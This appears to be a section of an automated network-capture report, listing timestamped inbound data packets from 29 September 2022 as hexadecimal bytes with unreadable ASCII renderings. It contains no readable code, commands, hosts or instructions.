                                                                                                                                                            2022-09-29 12:45:15 UTC25397INData Raw: 5c 91 62 f6 ca 02 9a 20 53 06 25 b8 7b 68 05 9d 14 dd aa ba db 5a 4a b6 73 90 08 aa 70 39 12 b7 bf 58 5b 79 28 c0 b2 c9 fc cc ed 64 f7 5a 33 f2 3e 0b 5f 1c 05 52 a8 32 39 fd 1f 91 6d ba 9f 2a 31 1c 63 79 ea 76 ad 4a b1 6e 0a 75 a3 bd 21 e1 63 5d e0 eb fa 0e b1 4d 09 f4 01 8d 2f 3c 24 37 8d f2 f4 2d e0 8e 2a eb df 83 77 fe 82 a1 fc 38 3e cf c5 ad 92 a4 fb 36 65 42 e1 ea a7 a3 61 cf e9 36 8b 04 ce 0c 78 cd 28 66 b2 f0 99 05 bc c1 b8 e6 fa 24 da d1 03 8b 5d 30 d5 26 61 dd 28 71 e9 96 62 c7 46 59 d9 dc 36 98 81 af 96 69 60 92 24 91 44 45 c9 b9 4b 83 fe f5 8e 76 92 9a a2 a4 8d 67 61 a0 9b 35 43 b9 33 4e 32 d0 dc 29 34 a3 aa 8a e8 95 d3 a7 fd ca e7 4f 81 c5 47 fc 78 a6 01 86 32 55 53 b6 09 8f 12 29 be 7d 04 34 1a 4a a5 91 be 0e 56 1c 89 13 86 3c b2 77 a3 5b 4f
                                                                                                                                                            Data Ascii: \b S%{hZJsp9X[y(dZ3>_R29m*1cyvJnu!c]M/<$7-*w8>6eBa6x(f$]0&a(qbFY6i`$DEKvga5C3N2)4OGx2US)}4JV<w[O
                                                                                                                                                            2022-09-29 12:45:15 UTC25413INData Raw: e0 a4 e3 12 4d e0 75 5c 4c 25 5c 7d 2f c1 3b 94 c4 38 84 88 7d 62 87 44 88 9c 7b 4f ce e7 89 3c 08 64 c6 df e7 a0 88 c7 5f c3 57 10 90 8a 93 9d 28 79 bf e8 9f 1c 93 36 74 da 2e fc 0f bb fc cd 98 25 04 94 cd ff 28 c6 04 2d 6e 85 82 53 5d ed 01 6a 14 b9 b0 ab ed a6 2a 9d 83 5f 73 ba a5 07 52 98 71 9e c4 09 0e fe 60 9f 0c ae db ec 04 12 18 4d 99 7a 7c e9 eb 9a 31 13 55 b1 27 d0 23 f9 5d f1 33 ea 84 0e d8 6a 2d 48 18 02 dd bb bd 3e 2b e6 37 cd 0b 3d 2c 1d f8 d4 5d ef a6 f4 ee 3f 55 a5 b0 ae 23 58 ef fa 72 40 40 cc 00 0c e7 e9 67 07 ba 7e 45 18 60 0c 65 b2 7e 44 04 69 ee 71 a2 6c 71 3d af 0f 7f 58 98 cf a8 2c c7 50 00 2d 73 ce 6d f5 52 b6 67 44 39 6b b8 0d ba 0a 83 88 4e 5f 28 2b 1d cd 4d 25 93 91 2a 51 dc 6f 77 e2 2c 27 fc e7 f2 86 ee e5 94 2e 14 43 c6 15 8f
                                                                                                                                                            Data Ascii: Mu\L%\}/;8}bD{O<d_W(y6t.%(-nS]j*_sRq`Mz|1U'#]3j-H>+7=,]?U#Xr@@g~E`e~Diqlq=X,P-smRgD9kN_(+M%*Qow,'.C
                                                                                                                                                            2022-09-29 12:45:15 UTC25429INData Raw: f7 22 3f 2e 39 b8 1f ee eb db c0 2c 59 d4 fb 9c 06 66 ae f6 70 53 18 bc 6c fc 1d 5c 78 1f 58 93 b7 6f c7 72 60 cf 60 0e b7 c1 45 bc 44 e6 d3 85 15 66 3c 02 33 b9 7f 2b dd db 3a c9 b7 9b 95 8c 7d b0 41 29 d5 47 79 64 b8 ea b8 9a 68 af c9 46 c5 15 b9 49 11 34 ac d8 ed 58 a9 15 4e 07 78 76 78 ae 54 ce 4d 0c 52 b5 8b a5 bf 9e 90 e9 16 02 29 98 15 68 b1 29 5e 00 5e dc 55 b0 6d 9c 54 af a7 3e 7d 9d c5 66 37 1e 7c e6 e9 c7 96 c6 88 05 63 d7 fe d3 a5 fe 34 45 b4 d7 3f 4b 5d 05 88 90 10 3c 35 58 f6 31 30 1f 32 2d 6f 22 3c c1 f2 67 67 92 df 4b 45 6d 6b df a8 ce 5f 78 8c 67 31 92 4e 22 7d ab 5e bb 83 3f d7 91 c4 72 cc a0 89 55 db b7 c3 19 2a 1a 5e 89 56 38 9a 19 b6 7d e9 25 61 bf 90 99 8f 69 cf 42 8b 25 0f 8d 6e aa 27 85 ee 17 b6 a0 7f ef e3 3b cd 6b 62 f5 e0 5e fe
                                                                                                                                                            Data Ascii: "?.9,YfpSl\xXor``EDf<3+:}A)GydhFI4XNxvxTMR)h)^^UmT>}f7|c4E?K]<5X102-o"<ggKEmk_xg1N"}^?rU*^V8}%aiB%n';kb^
                                                                                                                                                            2022-09-29 12:45:15 UTC25445INData Raw: bb d1 4b 19 23 c4 02 68 2b 72 d4 f6 d7 75 a4 d7 dd 2e be 6f 38 1a ad 53 e1 59 53 d3 44 46 28 83 28 72 8b 22 74 42 aa b9 aa 07 e2 14 67 b8 a1 38 7c a2 08 e4 87 cc 61 02 79 00 68 e2 6a 84 3d e6 70 67 f0 fe ea 6b d4 ba 18 72 de 6f 28 f2 6f 82 6a f4 d9 f5 26 70 7f d8 6d 14 5a 1c f8 63 03 51 da ae 38 7b e2 66 b1 ce 2b a0 98 8c 8c fc 8a 35 d8 52 af fe f0 cb 70 ad 07 93 20 16 32 16 9f f0 16 73 40 b7 ef 34 25 e0 f2 4b 62 b0 5e ef 2c ab 75 8c 49 03 ef 72 94 c5 25 8a dd 47 8a c3 f1 9d 61 f2 fc da 4c 10 f8 ce 2c 67 dd d0 66 33 3b 2c 51 ed 1e 7b 84 09 00 4d 65 8a 03 aa 2c 2a e2 16 d0 c4 42 d1 e0 f1 01 99 64 be b6 ea 3b 25 b6 a6 b7 6d 47 f5 55 1c f7 72 8d fb 9d dd 97 58 1d cb b4 8f 1b af 46 23 ca c8 55 a5 23 c8 8a 52 6a f7 20 61 7c 0d 40 db 71 69 a6 71 04 cb 63 1e db
                                                                                                                                                            Data Ascii: K#h+ru.o8SYSDF((r"tBg8|ayhj=pgkro(oj&pmZcQ8{f+5Rp 2s@4%Kb^,uIr%GaL,gf3;,Q{Me,*Bd;%mGUrXF#U#Rj a|@qiqc
                                                                                                                                                            2022-09-29 12:45:15 UTC25461INData Raw: 4b eb 9d 05 75 6c 1d e5 dc 28 7e 23 5c 89 2f b9 b6 28 f0 55 3e 19 b1 b9 ae 55 2a 25 be 08 2f 1f 4f 82 01 da 61 9d 81 3f ae 27 ed 4f 68 bb ba fd e7 4d dc 58 38 1e 7d 63 83 e6 21 34 36 57 8a 94 0f 87 87 8f 55 cc 78 d0 73 6c 1c b4 4c 08 1a 10 02 77 f1 82 f9 3e 77 68 4c 0d 31 1c b2 2e 4d 2c 56 e1 45 fe 1e a3 9d 00 46 24 6e bb b3 a9 94 34 46 c2 e5 e7 5f cb 3a d0 5d 00 48 76 a5 ce 6a 3a e2 3a 38 c3 c6 2f dc 92 e5 90 2f 1b 7a de 9c e0 32 f3 08 3c 7b b4 7c ba 54 87 b2 78 d4 e6 75 82 e8 7c 0a fa e0 4e 46 d0 66 fc 94 e7 6a ec 14 fd 34 37 55 56 60 1d 78 92 ee c1 13 0d 5b b3 63 8e a6 fd fd eb be f3 ed 84 ba a6 1a 80 c2 31 70 65 30 ce 8a cf 67 15 17 1c cc bf 99 5a 95 0f b9 dd 7f 04 06 d3 4a 81 a2 f0 ef 42 13 fc e2 66 a2 ba 10 b2 2f e9 3d 02 8f a8 26 ec 29 ce 14 07 44
                                                                                                                                                            Data Ascii: Kul(~#\/(U>U*%/Oa?'OhMX8}c!46WUxslLw>whL1.M,VEF$n4F_:]Hvj::8//z2<{|Txu|NFfj47UV`x[c1pe0gZJBf/=&)D
                                                                                                                                                            2022-09-29 12:45:15 UTC25477INData Raw: 9e 4c f6 85 f1 5f 90 b4 19 57 9e fd fd 0d 06 fa 20 89 51 79 d1 ca 46 ee 4a d9 90 c9 75 8a f7 2b 59 f2 0b 70 f5 75 f5 12 a5 e7 fa 51 77 48 15 e2 ab a4 f6 f1 21 e6 ec 3f 32 70 01 79 74 e4 c0 31 45 f1 35 1b 21 0a 87 ee 89 29 ee bd 02 28 1b 39 bd 59 81 55 93 f7 9f 7f e0 45 74 6b 74 9a ba ae e6 1d a7 39 76 a2 15 dc f4 46 f5 51 68 66 04 fe b6 a6 a0 31 62 a9 17 95 0b ad 8f 09 92 8f bf 71 0c 4f 63 0a a0 a0 15 30 b9 a8 6c f3 09 6e fa 8a 22 68 0f b3 07 a0 5f 00 03 c1 33 44 c1 63 3e 7c c9 50 44 20 cf 73 08 d6 ba 7a a6 ac 06 fb 5b 30 50 24 0a dd 69 17 f1 f2 78 28 2c be 57 a8 cb 76 1b 12 dc 2f 49 dc 51 4a 62 6c 72 77 ed c5 f0 26 7b 15 9d 5e 31 40 a8 ed e1 38 cd 3a f1 96 7f 91 79 2a 0d 2e aa 51 b1 c4 16 e6 c0 63 84 a6 9d 95 d3 4a 87 48 7d 78 1b 36 12 aa ce 6d ba fb 17
                                                                                                                                                            Data Ascii: L_W QyFJu+YpuQwH!?2pyt1E5!)(9YUEtkt9vFQhf1bqOc0ln"h_3Dc>|PD sz[0P$ix(,Wv/IQJblrw&{^1@8:y*.QcJH}x6m
                                                                                                                                                            2022-09-29 12:45:15 UTC25493INData Raw: 90 ca f3 59 96 22 9b de b4 b8 ac 3d e1 51 37 46 6b fb f7 ed 38 a3 1f 17 82 0d 59 52 0a eb 3c 36 c7 4e ba 59 67 7b ad 6a 07 d2 19 13 d1 7e c6 e1 32 7e 76 34 17 f6 b8 99 3a e7 17 80 ee b9 aa 12 40 3a 14 f7 d5 13 c5 a0 17 64 9f b9 4f 62 fc 6b 44 66 3b 58 24 55 ec ad 02 39 35 6e 38 39 71 c0 90 0b 2a 13 c7 44 ef 99 4e c2 cd 8d d2 8f 86 f9 c5 95 f5 05 5d 35 1f 32 6e 54 35 0d 5c e5 dc 94 cd 34 1b 93 92 ca d4 ee f8 39 1b b8 e1 1d 14 3e 92 de 89 cb 77 c2 cb a2 0b 9a 1b 0c 2a 00 19 d8 c4 f6 5a 94 63 4c f5 87 a4 18 0d be 5f 79 6a dd d2 54 59 43 2f 40 09 62 88 63 54 ca 45 e1 58 f2 49 40 ac a0 c9 bd 85 fb 01 3b a9 f6 02 6b f5 0e d1 60 01 27 df 2c e7 04 23 a2 98 35 42 fc a3 d4 66 9d 21 6c f0 31 ec 2b 1a 04 a9 5c 12 50 d5 3e b6 72 1f 64 e5 7d 62 d2 cb b3 26 36 28 35 1a
                                                                                                                                                            Data Ascii: Y"=Q7Fk8YR<6NYg{j~2~v4:@:dObkDf;X$U95n89q*DN]52nT5\49>w*ZcL_yjTYC/@bcTEXI@;k`',#5Bf!l1+\P>rd}b&6(5
                                                                                                                                                            2022-09-29 12:45:15 UTC25509INData Raw: 39 25 61 9e 4e 64 d6 db 59 73 e9 d7 16 b6 1b ff b0 cb da 2a e4 dd 63 e2 62 f5 a0 05 0a 21 f6 b8 3f 5a df 84 8e 2a 37 21 9d 20 ba 57 dd 52 6e f1 44 2e 29 93 2d 81 14 29 d9 ea be d6 86 9a 24 0e a2 d8 af 35 2f 23 bb 5d 73 b0 b0 40 3d 08 13 e1 86 e3 9d d6 88 91 34 81 ad e9 5a 47 26 bd 84 0b 3a 70 d7 3f 60 36 c7 4c d4 d0 11 91 4f 66 a0 d1 43 3b 33 69 b3 6b 0c c3 0c 3e 5e d6 79 0e fd cb d1 55 05 36 f1 0f e0 1d d4 13 e3 cb f1 9b 4e 60 bc df d1 b4 d6 87 de 2a aa 19 4f 7f 12 e5 5a 7b 73 b4 98 1c d4 42 a0 72 62 19 d0 4a c1 d9 2f 2c 13 7f cd 02 be 41 04 cc 9d e9 b6 64 8c b0 f3 2e 46 78 c1 48 ef b1 bc b2 1a d7 37 91 f9 a8 b8 22 c3 8e 09 d2 8b 1e 57 99 40 56 12 75 2f 2c 45 65 ce e5 3f b0 47 21 5a 90 8b 0a 01 e2 50 32 3d 8c 94 6b 8b a7 08 58 b8 94 7d 51 26 6d df 7a 52
                                                                                                                                                            Data Ascii: 9%aNdYs*cb!?Z*7! WRnD.)-)$5/#]s@=4ZG&:p?`6LOfC;3ik>^yU6N`*OZ{sBrbJ/,Ad.FxH7"W@Vu/,Ee?G!ZP2=kX}Q&mzR
                                                                                                                                                            2022-09-29 12:45:15 UTC25525INData Raw: 2a c9 d0 10 7d 0f f4 67 d2 69 84 10 f3 07 36 f1 da e4 be a1 57 71 dc b2 0c 49 ad 19 7e d5 87 96 cd 20 65 a5 e0 50 43 f5 12 91 74 28 5c c6 fc 22 c6 49 0c 6f d2 cf db 9f 38 53 99 ec c9 40 a9 a0 c6 98 55 06 a6 d6 ea 02 f9 8e a4 d1 ed 71 74 3e 01 2f f9 7d 41 1e 95 2a da a7 45 7c 61 70 a1 25 02 ca ad d7 83 46 37 80 11 0b d0 a6 4f e0 b6 03 e2 21 53 35 96 32 04 51 4c c2 0f b7 d7 6c cb d2 e1 d4 26 23 46 c0 a3 68 a9 4e 88 90 ef d0 9b 17 63 c9 a4 e8 78 bd 92 6a 12 57 cb 81 00 3c 99 69 85 6e d8 3c 6d 8b 0b ac 97 76 9f db 82 d1 da fd 48 e9 d1 aa 97 7d 56 98 7f 70 fa 15 58 8c 15 33 cf 40 5b ff 1e 53 3f 68 6e 81 52 51 b8 78 50 6c 99 c4 98 39 91 1d 8a cd 24 8b 4c a5 66 ce 4c 5e 22 e5 f9 34 6b 22 f2 1c 89 d5 40 f7 81 4d 86 6c 5b 0a f7 d8 4a 8a b4 76 5e a0 38 63 47 14 99
                                                                                                                                                            Data Ascii: *}gi6WqI~ ePCt(\"Io8S@Uqt>/}A*E|ap%F7O!S52QLl&#FhNcxjW<in<mvH}VpX3@[S?hnRQxPl9$LfL^"4k"@Ml[Jv^8cG
                                                                                                                                                            2022-09-29 12:45:15 UTC25541INData Raw: 3f b0 25 ab e8 80 1d f0 d9 9e ed a2 a0 5e 28 e8 79 83 e4 aa 75 6f 4a d9 9f c0 df 35 58 40 5e a0 4b 37 2e 99 2c e1 66 d4 e3 23 92 4e 8c 25 a2 68 9a 1a 3c b3 b6 86 0d 23 f7 e3 22 c0 12 9f a3 cd af 39 38 dd 70 be 6f d4 cf a6 44 cd 26 20 25 8a be 62 63 a8 51 f6 ba 0e 90 d5 af 33 a4 45 c4 fc de ad d6 08 b6 f2 5c cb 8c 71 d3 31 44 b2 0b aa 3b 18 96 98 14 27 a8 d1 9c 7e 1d 9a 9b e3 e1 cb 64 ad e6 a2 82 86 07 fc 4b 90 de 9f 7a 88 71 3f 15 a2 a3 8b 95 3a 84 7f d1 b2 77 54 17 e6 8d e5 6a a4 70 33 9a 1e 8d 16 24 07 36 bd bc 66 51 b6 07 68 74 c3 45 7e 80 5f 00 ad 98 b2 34 36 e0 c7 2a 03 32 44 73 ca 7c be bd 55 41 84 20 77 ad 46 03 54 c3 bc 91 99 d8 17 b6 02 d1 79 7f de 20 5f 2c 68 17 4a a9 1f 8f cb 68 f5 c9 e4 3d 23 b6 27 fa 21 f0 df 3d 14 8b ea f3 bb d8 f3 8a 70 e1
                                                                                                                                                            Data Ascii: ?%^(yuoJ5X@^K7.,f#N%h<#"98poD& %bcQ3E\q1D;'~dKzq?:wTjp3$6fQhtE~_46*2Ds|UA wFTy _,hJh=#'!=p
                                                                                                                                                            2022-09-29 12:45:15 UTC25557INData Raw: ca 92 27 77 f4 64 61 cf 8f e4 af be 53 b1 37 35 39 46 40 d3 d3 1f 32 25 b9 f9 31 1b 15 c0 cc bb 7b 63 f0 96 4d 20 b6 0f 53 49 bd e0 83 fc e2 90 33 00 14 9c 1a 20 9e 4d d6 19 0f a2 59 aa 0a 91 b3 21 45 de cf 7a d8 e8 86 f9 c8 ac a0 cc db b0 3d de e9 ca b8 29 46 f3 f2 df 67 f1 4b 8b 99 3a 71 79 57 d2 65 da 84 3c e2 4c 5f ff 28 39 e8 1a cb fb 7e 56 77 c5 70 3c 8e ab 73 a4 ce 16 aa 8b 50 f6 a7 6c 9c 0e 0a 1e e5 08 8f 97 7b 44 a5 ac e6 99 d3 77 6d fe 77 8a e4 c4 0a 57 11 e4 38 11 50 e8 b4 d2 fb 59 c9 76 68 da 36 f8 b1 9c dc 3a fb fd 9f ca 24 1a 9d 9e 80 1b bf 50 d8 27 4a 20 b0 5e f0 0c ce 29 64 a3 65 9f d0 61 14 34 a0 b0 60 b4 a1 20 3f 90 7e 2a 78 d8 18 30 72 4a 6a dc 20 3f eb e4 6d 9a 8d 3d c1 91 04 0f a0 a9 69 70 a9 b9 91 b0 91 de 4a 0d df 16 45 31 ce ea ad
                                                                                                                                                            Data Ascii: 'wdaS759F@2%1{cM SI3 MY!Ez=)FgK:qyWe<L_(9~Vwp<sPl{DwmwW8PYvh6:$P'J ^)dea4` ?~*x0rJj ?m=ipJE1
                                                                                                                                                            2022-09-29 12:45:15 UTC25573INData Raw: 39 00 97 f4 44 7a da ed ea 49 97 5f 15 47 3b dd cb b2 ae d7 9d 47 5d b1 db ed 67 ef f7 af 9b 1e 3e d3 63 09 ba ae e6 2d c8 ee 99 dc 33 95 7d da ca c6 48 61 06 ed c6 e6 db d8 5c 9f f6 db a1 0b 5e 9c ca bd 14 3a 73 eb 2e 61 a7 cc 24 b8 0a 18 cb 44 94 4c e7 8b 44 3a 7b 24 48 47 45 13 35 df 3a 82 af e8 b8 27 2f 65 d1 16 9d b2 47 9c bc e7 6b 59 fb 73 62 5e 01 d0 b6 3f 48 ec b8 d0 a7 db 5d ce f1 4c ab 29 35 69 c6 c4 2f 48 45 13 3e 3e 41 d7 42 fc 81 88 76 7a 29 4a e2 e2 2f 47 13 50 28 7f 2b 32 30 26 be 6f 65 d8 a1 ce 64 46 2e ef 07 11 b8 46 09 82 1d 49 78 69 12 7f 11 34 22 ac a4 3e 98 c7 91 5a a0 65 8e 09 77 13 5a 84 07 c8 1e 4a 8f 42 8d 92 e0 aa 43 60 24 a5 f8 d0 88 fb b3 97 c7 5d e7 6a 2c ee cb 53 9e cf 6c d0 fe 4a 8d f2 79 6d 33 a1 05 01 ad 23 34 b3 8e 10 b9
                                                                                                                                                            Data Ascii: 9DzI_G;G]g>c-3}Ha\^:s.a$DLD:{$HGE5:'/eGkYsb^?H]L)5i/HE>>ABvz)J/GP(+20&oedF.FIxi4">ZewZJBC`$]j,SlJym3#4
                                                                                                                                                            2022-09-29 12:45:15 UTC25589INData Raw: 45 36 75 a5 4e 20 1c 70 87 d2 1c 9f 0e 01 e1 e1 65 06 13 91 35 b1 ec f5 5d a8 78 8d 56 29 05 a0 9d 8a b1 9d 54 2d cb 14 f9 e3 0b d4 af 5c e8 44 4d f4 f0 3c 7e 60 7e 10 86 9b a7 06 9b 31 f4 dc 67 b4 7b 1c 7c 14 33 c3 38 93 3a 56 60 7e 24 d6 a6 82 6a 9f 2a 18 26 ce d4 df 91 48 04 af e3 37 20 50 ec 83 87 4a dd f3 82 f1 91 f8 24 cb e7 24 eb 7f 14 86 96 10 19 41 87 e1 66 73 48 d0 2f 73 4a 77 23 96 52 53 9a b0 84 78 af b3 51 44 b3 74 45 5a 23 9d d4 4e 5d 5a e6 4b 90 8c 81 04 49 8e 92 2c 55 c8 95 6c c0 34 d4 a7 84 3c ea 4d 40 51 96 5e b0 1f 51 34 42 ec 39 17 46 15 99 83 9c 04 42 f9 e1 32 7b 22 84 32 c1 d3 12 65 8d 95 fa 98 af 28 d8 f1 1f 16 86 fa 77 1a e5 0a cb e4 35 f3 78 4f 7c 16 e6 ad dd e8 eb 44 0c 60 5d f7 bb 10 74 6f 3d e6 94 68 5a 6f 47 4c e6 3e 23 a4 b9
                                                                                                                                                            Data Ascii: E6uN pe5]xV)T-\DM<~`~1g{|38:V`~$j*&H7 PJ$$AfsH/sJw#RSxQDtEZ#N]ZKI,Ul4<M@Q^Q4B9FB2{"2e(w5xO|D`]to=hZoGL>#
                                                                                                                                                            2022-09-29 12:45:15 UTC25605INData Raw: f8 7a 7e 6d a5 c3 c0 58 8a 8e 55 fd 1e aa 73 80 bd be ef ee 78 fb 16 35 97 e2 e0 fc 1d 0e 4a 22 0e df 10 32 12 9e 35 d2 94 d8 5c 89 d7 e2 cf 84 ba 94 5f 51 a0 b8 a5 7a 33 fc 91 f4 5d 92 a6 a9 40 eb a9 8b db e5 b4 80 88 aa 50 26 54 22 a6 4d 6a 74 42 cd 4b 49 e0 ae 7c f8 37 9a 5b 5f ff 27 2c bf 5d c8 74 d4 55 2a c1 97 94 b8 81 dc 29 2e c2 a9 dd 4c 48 72 33 65 e8 7d 54 3a f0 de e7 a4 ba e3 4f af 55 82 ac 94 5d 86 93 e8 9e ac 07 e9 79 85 72 70 50 dc bc 87 20 a2 c5 46 f3 dd 40 90 2a 6f 92 02 45 6a 86 da a3 d8 76 46 8f ef 58 31 92 33 98 50 75 aa 13 21 67 da 21 5e 3c 81 ed 42 d5 7d e7 05 c9 f8 63 e9 70 9c ab 66 39 ee 9e 8a 66 60 03 b9 36 e8 51 12 e6 6e ed 46 35 c5 27 98 6b 5f 8c 6c 3a e8 97 46 e6 78 47 b9 8a 6b 66 95 1d 0c be 12 22 29 a4 e0 33 94 94 0d 5f 9e 09
                                                                                                                                                            Data Ascii: z~mXUsx5J"25\_Qz3]@P&T"MjtBKI|7[_',]tU*).LHr3e}T:OU]yrpP F@*oEjvFX13Pu!g!^<B}cpf9f`6QnF5'k_l:FxGkf")3_
                                                                                                                                                            2022-09-29 12:45:15 UTC25621INData Raw: 61 62 81 26 2a 45 d3 2e 8b a0 6b b5 6f 98 11 4d 43 9b 3e 78 5c 37 7c 3c 40 6c 57 91 0d 33 26 69 3e 43 3b e8 c8 66 5c f6 5c fb 68 5d 6b 81 bf 49 a6 07 26 e6 52 6d 73 72 6e 63 c3 6e 96 cc 46 2a b1 0c 0e 66 8c 59 33 16 40 c5 1d dc d0 f9 71 3d 73 08 62 59 7a e9 99 20 55 43 3c e4 1f 23 de 12 ed b3 46 2b 98 f2 f8 d3 11 cd a8 7f c0 b3 e3 29 70 78 2f 56 ae d6 c0 3e f6 f4 1c b6 cd 79 59 58 47 4e b6 6e 76 8c f6 c4 41 74 9e 49 8f da c3 56 12 76 f1 bb a7 81 42 26 a1 8f d5 e4 25 44 f5 52 0e 52 6c ef 2c 97 a9 ae 9b e2 ba 97 72 71 a3 21 07 62 34 cc cb a1 7a 52 c2 94 47 fe 5a 1a d7 3a ec b3 93 1c 4a 1b 7a ce 53 f6 51 7e 99 b8 d0 0e ce 7c fb 73 f0 30 72 e0 1a e7 2a a3 2f 3c 0e b2 5b b9 ea a5 97 a9 0e a9 7a 7e 01 d0 0b a0 28 63 e4 ad 21 e4 a9 6d df 48 25 e6 68 98 9d 35 9b
                                                                                                                                                            Data Ascii: ab&*E.koMC>x\7|<@lW3&i>C;f\\h]kI&RmsrncnF*fY3@q=sbYz UC<#F+)px/V>yYXGNnvAtIVvB&%DRRl,rq!b4zRGZ:JzSQ~|s0r*/<[z~(c!mH%h5
                                                                                                                                                            2022-09-29 12:45:15 UTC25637INData Raw: 13 aa 47 62 fc 10 7f b8 8e a6 ba 32 b8 2b ee c9 c0 bf bf ab 80 b1 d2 a5 4c 0c 05 a7 e0 ba 9c a2 3b 62 e8 36 de 2e a9 ba 54 e4 52 4e 87 4b 04 51 7a 8b 87 db b6 c8 5d c4 26 4a f8 49 7e 09 01 d9 51 78 dd 87 3d 21 d4 a0 cd 4e ef d9 25 c3 65 cb 64 26 98 95 82 96 eb 0e a4 23 eb 51 15 86 55 68 aa a5 61 c0 f1 c6 cb 1e 13 a7 fe 2c c6 95 b4 85 cb ab 62 49 b8 66 b0 18 90 a8 88 b7 6a 29 ae 06 4a a2 87 06 50 2e e7 fc 78 d8 d8 44 8c 70 e5 5d 92 08 40 e8 04 04 e3 b3 c7 6b c0 2b d4 8f a4 97 f4 09 9b 2f 3f 12 f1 70 25 32 6e de 73 22 a6 64 6b 1d 28 ba a2 0c b5 10 a3 3c e5 c6 b7 cc 86 89 18 c4 f6 be 5e a3 6a 89 42 a7 5c 89 6a f0 75 94 ab fc cb 0e 85 16 cc aa fd ba a5 ec 25 ea 96 f3 4a f4 2c 26 c8 53 6c 96 d9 90 48 30 a5 10 45 91 36 e1 bb 93 d9 49 ab 0e ed 6d 82 b9 e5 4d 1c
                                                                                                                                                            Data Ascii: Gb2+L;b6.TRNKQz]&JI~Qx=!N%ed&#QUha,bIfj)JP.xDp]@k+/?p%2ns"dk(<^jB\ju%J,&SlH0E6ImM
                                                                                                                                                            2022-09-29 12:45:15 UTC25653INData Raw: 86 db d2 f8 3b 50 55 e2 e9 96 43 bd 17 38 71 f3 fa 67 66 a9 f2 0a 58 db 7f cf d1 c9 a1 79 81 24 57 f1 ef 10 43 56 73 9f aa 32 85 e6 2f 34 09 cd 5a ea 12 d3 fe c1 8a 51 f5 70 62 f5 91 38 b8 02 95 05 ea 9a 35 e9 32 b1 2d e3 e0 b3 7a db 5a 3b c8 e0 ba c3 18 e6 aa d7 1d 52 7f 63 ce b5 af d5 dd 43 ed f9 8e 60 5d 06 a2 1c d7 b5 b3 49 3e a7 85 e3 0d 3a db b3 23 46 6f 45 ee 1b e5 53 bf 87 7a 9c 18 f6 c6 32 83 98 d9 c8 f6 1d 87 09 c4 8d e7 c8 ac bb b9 19 c3 86 8c b2 d2 69 c7 02 fe 7e f7 2b 29 dc 6d 8e cf 25 44 5f 56 f5 e5 45 75 f0 03 ca 38 6d 01 c7 93 5f bd e3 b2 44 1a 13 83 9b d5 55 66 a4 e9 b9 af be 1b 60 ef 87 da 96 1a b2 22 89 69 c9 1d a0 1a b8 5e d7 25 64 cc 3c 20 b4 d7 33 a8 30 c2 51 72 d3 44 7b 9a ad 78 ec 80 62 1b 03 34 70 c8 b4 f3 50 b5 b2 aa c1 92 5c 3c
                                                                                                                                                            Data Ascii: ;PUC8qgfXy$WCVs2/4ZQpb852-zZ;RcC`]I>:#FoESz2i~+)m%D_VEu8m_DUf`"i^%d< 30QrD{xb4pP\<
                                                                                                                                                            2022-09-29 12:45:15 UTC25669INData Raw: 92 18 cc ec fd 1a 64 e5 73 09 e8 48 cf 2b 05 48 16 17 aa 68 42 c1 6f 8b 0f 19 19 bb 60 2f 82 9d 91 93 36 1d bf 64 98 c3 c3 f5 c3 99 cc 9e 5f 8a 67 1e 28 65 3e 64 79 dc 0c c2 5b d7 c7 06 c5 56 be 5d e4 eb f5 08 a6 30 3a 6f 0d 72 22 5e 2b d3 a6 7e 4b 31 d3 19 0d a1 83 bc f2 79 91 f1 07 59 ed d4 22 19 08 e7 ed cd 55 ae 2a e7 94 7c 77 5e 94 69 49 96 a9 b4 4b 3d 85 3a 29 36 4d 9c 6e 9a 94 00 a3 84 1d ff ef 58 ec c2 13 95 63 10 65 70 52 5a f1 2e 15 e3 06 cf 69 fd 73 b4 a9 c4 f2 64 bc 23 88 f9 bf f6 bf ed 1a 1f 41 ce 75 7d a7 17 b3 42 46 4c 0c 10 d4 25 b7 a2 b1 8c c3 48 fe ea 30 35 29 3b 7b 24 0b d3 20 33 ce 32 70 c7 bd 22 3c ab a2 7e e9 9b 59 2c 0e db 5d 69 22 84 17 09 dc 6c 17 51 69 bc b2 a2 e5 27 ad 8e 68 7a 6b 63 73 d3 0f 68 9f 01 96 45 17 1e 95 73 77 f6 e3
                                                                                                                                                            Data Ascii: dsH+HhBo`/6d_g(e>dy[V]0:or"^+~K1yY"U*|w^iIK=:)6MnXcepRZ.isd#Au}BFL%H05);{$ 32p"<~Y,]i"lQi'hzkcshEsw
                                                                                                                                                            2022-09-29 12:45:15 UTC25685INData Raw: 52 3b 88 26 a2 aa ad ce 29 16 3f 2e fe 48 ba 2d 41 4d d7 c5 fb 79 bd 79 40 a1 3e 99 46 db cb b3 d1 4f 7b 74 f8 6a fb c2 3e 4a d1 03 1b f3 28 6c 07 1d e7 3a db 13 1e 62 bc 1c c3 b4 40 e9 c8 c7 4e 0d 02 9e 5e 12 0a a7 6d 95 98 96 9b dd 90 97 5c 83 70 b3 4e f9 f8 0c 52 ef 18 04 24 b0 79 65 ee 86 53 9d b0 57 44 31 e1 00 56 3d 17 16 3a b0 aa 4b ba a3 b2 20 79 83 3b 65 dd 1d 9e cf 76 ee 51 81 94 7b 67 d2 fa ed 97 43 51 20 06 87 57 6d 04 f3 e2 03 74 74 f9 00 0f 80 13 33 b2 3f e6 a8 cd e8 b5 b9 c3 38 ed 8c 90 6b a5 0e b9 f6 f3 d1 68 27 c1 48 16 8d 76 53 a7 d4 59 67 03 08 c7 90 54 1c 46 c7 38 74 9a 91 91 33 7a cc ab 40 48 8a f5 48 23 49 e2 06 af 0a f4 cf 76 0c 00 df 75 05 3d b7 49 54 7e f9 8d ba 18 55 76 cf cd 32 62 8c 5d a0 03 f9 59 7f da 22 fe 70 d4 e4 2c fe bf
                                                                                                                                                            Data Ascii: R;&)?.H-AMyy@>FO{tj>J(l:b@N^m\pNR$yeSWD1V=:K y;evQ{gCQ Wmtt3?8kh'HvSYgTF8t3z@HH#Ivu=IT~Uv2b]Y"p,
